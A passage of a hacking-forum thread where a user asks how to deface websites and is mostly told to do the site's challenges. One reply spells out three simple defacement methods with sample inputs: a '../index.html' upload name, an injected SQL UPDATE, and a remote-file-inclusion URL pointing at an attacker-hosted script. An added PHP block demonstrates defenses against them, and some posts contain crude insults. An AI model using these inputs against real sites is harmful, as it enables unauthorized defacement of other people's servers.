
About defacing websites


ghost's Avatar
0 0

First of all: I do not intend to compromise the security of any website. I am trying to learn for educational purposes only.

Is it common with web defacements? I mean like the index page has been replaced or edited. Which methods are used nowadays? I've read that people used to hack IIS, but I think that's outdated… I'm not sure, tho. Let's say that I install a web server on one computer. What tools should I use to deface it remotely?

Again: I just want to learn the methods :)


stealth-'s Avatar
Ninja Extreme
0 0

icecground wrote: First of all: I do not intend to compromise the security of any website. I am trying to learn for educational purposes only.

Is it common with web defacements? I mean like the index page has been replaced or edited.

Is what common? I'm not sure what you're asking here.

Which methods are used nowadays? I've read that people used to hack IIS, but I think that's outdated… I'm not sure, tho.

People still target IIS. IIS is Microsoft's web server software. More commonly Apache is used, however.

Let's say that I install a web server on one computer. What tools should I use to deface it remotely?

Hacking is not (and should not be) a "use tool on webserver and get root" activity. You need to learn how the exploits work and how to do them.

Again: I just want to learn the methods :)

"Learning the methods" is not something we can just tell you over a single forum post. This entire website is dedicated to learning to hack; it takes time to figure it out, not just a single day of leisure reading. I don't think you understand what you're asking.


ghost's Avatar
0 0

Well… I'd like to learn how to find the exploits, then.


stealth-'s Avatar
Ninja Extreme
0 0

icecground wrote: Well… I'd like to learn how to find the exploits, then.

Again: Start with the challenges on this site. It's not something we can just "tell" you how to do like you are expecting us to. You have to put dedication and hard work into it. Learn a few programming languages, do all the challenges on this site, put years of work into it, then maybe you'll have something. It's no small accomplishment to be able to hack.

I'm not sure what sort of answer you are expecting from us, but we can't just be like "Yeah, you hack any website like this: ".


ghost's Avatar
0 0

Well, it's just that I know some programming and such, and now I want to learn web defacement and server hacking. I know it will be hard, but I want to know where I can start, and how I do it =)


stealth-'s Avatar
Ninja Extreme
0 0

Start with the challenges on this site. If you really want, it's also very helpful to create your own webserver on your local machine and create exploits and learn how they work internally.


ghost's Avatar
0 0

Thanks for your support, but I'm still not really getting how I'm supposed to learn how to find the exploits. I've built some scripts in PHP on localhost, and tried SQL injection. But I want to learn server defacements. I thank you so much for your time and hope my questions aren't too dumb =D


stealth-'s Avatar
Ninja Extreme
0 0

icecground wrote: Thanks for your support, but I'm still not really getting how I'm supposed to learn how to find the exploits.

You learn to find the exploits by understanding how they work.

I've built some scripts in PHP on localhost, and tried SQL injection. But I want to learn server defacements.

The 'server defacements' you are talking about is just using the exploit to gain privileges that allow you to overwrite files on the webserver with your own files. You have to gain access first.


ghost's Avatar
0 0

Well, in order to test the exploits I must know what to do, ain't that so? I can't do a SQL injection without knowing what to write. And could you give an example on how to overwrite a file? Just so I can understand.


ghost's Avatar
0 0

http://en.wikipedia.org/wiki/SQL_injection

I would venture to guess you have used Google to acquire the information you seek - if not, it's a good place to start for learning, howtos, tutorials etc… and for hands-on, try all the challenges relating to what you want to learn.

Good luck!


ghost's Avatar
0 0

Well yes. But I already know SQL injections, kinda. And if I want more information on how to do SQL injections I'll google it. But as previously written I want to replace a page on a web server with some method. And I'm looking for documentation/tutorials on how to do this.


stealth-'s Avatar
Ninja Extreme
0 0

icecground wrote: Well yes. But I already know SQL injections, kinda. And if I want more information on how to do SQL injections I'll google it. But as previously written I want to replace a page on a web server with some method. And I'm looking for documentation/tutorials on how to do this.

Here are some examples:

  1. The site in question has an upload forum. Upload a file and save it with the name "../index.html". That moves up a directory and will write to index.html with the file. That's called directory traversal.

  2. Say the site uses MySQL and you figure out how to execute any SQL commands you would like via an injection. Knowing the database structure, you could write a command like: "'; UPDATE pages SET content = "Hacked by Stealth-!" WHERE page = index.php". That's SQL injection.

  3. You manage to get an RFI. The site has PHP script like: "page.php?get=index.php". You can include a PHP document like this: "page.php?get=http://yoursite.com/evilscript.php". Then evilscript.php can be a PHP script which fopen's index.html for writing and writes "Hacked by Stealth-!" to it. That's remote file inclusion.

There are a plethora of ways to do it. The above examples are very simple and probably not going to work with admins who have any sense, but there are sites that are that insecure. The challenges here cover things exactly like the ones above. I'm getting seriously tired of spoon feeding you here.
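
Each of the three examples in the post above has a standard server-side fix. The following is an added example, not part of stealth-'s post or of any site's code, showing those fixes in PHP against inputs taken from the post. The function names, upload directory, page map and table schema are assumptions, and the demo needs the pdo_sqlite extension.

```php
<?php
declare(strict_types=1);
// Added example, not code from the thread. Directory layout, page map and
// table schema are assumptions made for this demonstration.

// 1. Upload: the client-supplied name is data, never a path.
function upload_target(string $uploadDir, string $clientName): string
{
    // No separators, no leading dot; \A...\z so a trailing newline cannot slip by.
    if (!preg_match('/\A[A-Za-z0-9][A-Za-z0-9._-]{0,99}\z/', $clientName)) {
        throw new InvalidArgumentException('rejected upload name');
    }
    return rtrim($uploadDir, '/') . '/' . $clientName;
}

// 2. Database: user input is bound as a value, so it cannot add statements.
function fetch_page(PDO $db, string $page): ?string
{
    $stmt = $db->prepare('SELECT content FROM pages WHERE page = :page');
    $stmt->execute([':page' => $page]);
    $row = $stmt->fetchColumn();
    return $row === false ? null : (string) $row;
}

// 3. Include: the parameter selects a key from a fixed map, never a file or URL.
//    (php.ini's allow_url_include should also stay Off, which is its default.)
function resolve_page(string $get): string
{
    $pages = ['index' => 'index.php', 'about' => 'about.php']; // constructed map
    if (!isset($pages[$get])) {
        throw new InvalidArgumentException('unknown page');
    }
    return __DIR__ . '/pages/' . $pages[$get];
}

// Constructed demo using the inputs quoted in the post.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE pages (page TEXT PRIMARY KEY, content TEXT)");
$db->exec("INSERT INTO pages VALUES ('index.php', 'Welcome')");

foreach ([fn() => upload_target('/srv/uploads', '../index.html'),
          fn() => resolve_page('http://yoursite.com/evilscript.php')] as $attempt) {
    try { $attempt(); echo "accepted (bug)\n"; }
    catch (InvalidArgumentException $e) { echo 'blocked: ', $e->getMessage(), "\n"; }
}
$payload = '\'; UPDATE pages SET content = "Hacked by Stealth-!" WHERE page = index.php';
var_dump(fetch_page($db, $payload));     // the payload is compared as a plain string
echo fetch_page($db, 'index.php'), "\n"; // stored content after the attempt
```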


spyware's Avatar
Banned
0 0

Get the fuck out of here you bloody idiot.


fashizzlepop's Avatar
Member
0 0

If you still have these questions after beating all the challenges your member page says, you are exactly what spyware called you. My guess is you cheated or just found spoilers.


ghost's Avatar
0 0

I've beaten them myself, thank you very much. And I thank stealth- for the info, although since I've beaten the missions I know about the different ways, but just not seen defacing that way. Well, since I can't post here because I get flamed by people who probably don't have enough social skills to participate in a discussion, I'll stop writing here.


spyware's Avatar
Banned
0 0

icecground wrote: I've beaten them myself, thank you very much. And I thank stealth- for the info, although since I've beaten the missions I know about the different ways, but just not seen defacing that way. Well, since I can't post here because I get flamed by people who probably don't have enough social skills to participate in a discussion, I'll stop writing here.

Stupid questions beget stupid answers. If you really want to learn something about security, install *nix, learn some C, Perl, and learn how computers handle memory (i.e. read Smashing the Stack for Fun and Profit a few times).

Report back when you've got that down, I guess?


korg's Avatar
Admin from hell
0 0

icecground wrote: I'll stop writing here.

Good idea.